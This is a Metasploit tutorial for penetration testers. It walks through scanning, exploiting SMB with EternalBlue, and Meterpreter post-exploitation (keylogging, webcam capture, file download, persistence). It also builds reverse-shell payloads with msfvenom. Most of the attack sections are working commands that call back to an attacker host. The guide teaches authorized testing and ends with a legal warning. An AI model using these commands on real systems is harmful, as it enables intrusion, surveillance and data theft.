Metasploit

🧠 What is Metasploit?¶

Metasploit Framework (MSF) is an open-source penetration testing platform developed by Rapid7. It allows security researchers, ethical hackers, and red teamers to:

Find & validate vulnerabilities
Develop and test exploits
Deliver custom payloads
Conduct post-exploitation (privilege escalation, persistence)

🔧 1. Installation¶

📦 Kali Linux (Pre-installed)¶

msfconsole

🐧 Debian/Ubuntu¶

sudo apt update
sudo apt install metasploit-framework

🐳 Docker¶

docker pull metasploitframework/metasploit-framework
docker run -it metasploitframework/metasploit-framework

🖥️ 2. Launch Metasploit¶

msfconsole

You’ll get the Metasploit banner and msf6 > prompt.

🔍 3. Metasploit Anatomy¶

Component	Description
Modules	Reusable scripts: exploits, payloads, scanners
Payloads	Code executed on the victim system
Encoders	Obfuscate payloads to bypass AV
Nops	Used for buffer overflow padding
Listeners	Wait for reverse shell/callback connections
Meterpreter	Powerful post-exploitation shell

🧪 4. Scanning & Discovery¶

🔎 Port Scanning with Auxiliary Module¶

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 22,80,443
run

use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.100
run

Or scan with Nmap:

nmap -sS -sV -O 192.168.1.100

🎯 5. Exploiting a Vulnerability¶

Step-by-step Example: Windows SMB (EternalBlue)¶

🧬 Step 1: Find Exploit¶

search eternalblue

🧬 Step 2: Use the Module¶

use exploit/windows/smb/ms17_010_eternalblue

🧬 Step 3: Set Options¶

set RHOSTS 192.168.1.105
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.101  # Your attacking machine
set LPORT 4444

🧬 Step 4: Exploit¶

exploit

If successful, you'll get a Meterpreter session.

🧰 6. Post-Exploitation with Meterpreter¶

🔒 Get System Info¶

sysinfo

🧍‍♂️ List Users¶

getuid

🗂️ Browse Files¶

ls
cd Documents
download secret.txt

🧪 Record Keystrokes¶

keyscan_start
keyscan_dump
keyscan_stop

📷 Webcam¶

webcam_list
webcam_snap

📥 Persistence¶

run persistence -X -i 5 -p 4444 -r 192.168.1.101

📡 7. Creating and Embedding Payloads¶

📁 Create Payload with `msfvenom`¶

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe > shell.exe

🦠 Common Payload Formats¶

Format	Output Type
`exe`	Windows executable
`elf`	Linux binary
`apk`	Android payload
`asp`/`php`/`jsp`	Web shells

🏹 8. Exploit Categories¶

Category	Sample Modules
Web	`exploit/unix/webapp/phpmyadmin`
Windows SMB	`exploit/windows/smb/ms17_010_eternalblue`
FTP	`exploit/unix/ftp/proftpd_modcopy_exec`
Apache Struts	`exploit/multi/http/struts2_content_type_ognl`
Android	`exploit/multi/handler` with `android/meterpreter`

👁️ 9. Automated Exploitation¶

A. Autopwn (deprecated but available via community tools)¶

B. Metasploit Pro (Commercial)¶

C. Manual Automation (for scripting)¶

resource scripts/exploit.rc

Sample exploit.rc:

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.105
set LHOST 192.168.1.101
set PAYLOAD windows/meterpreter/reverse_tcp
run

Run with:

msfconsole -r exploit.rc

🧪 10. Labs & Practice Targets¶

Metasploitable 2 (Best for beginners)¶

https://sourceforge.net/projects/metasploitable/

DVWA (Web Vulnerabilities)¶

docker run --rm -it -p 80:80 vulnerables/web-dvwa

OWASP Juice Shop¶

docker run --rm -p 3000:3000 bkimminich/juice-shop

🔒 11. Safety and Legal Warning¶

🚨 Use Metasploit ONLY on systems you own or have explicit permission to test. Unauthorized use is ILLEGAL.

📚 12. Learn More¶

📘 Metasploit Unleashed
📚 Metasploit Wiki
🎥 Hackersploit Metasploit Series (YouTube)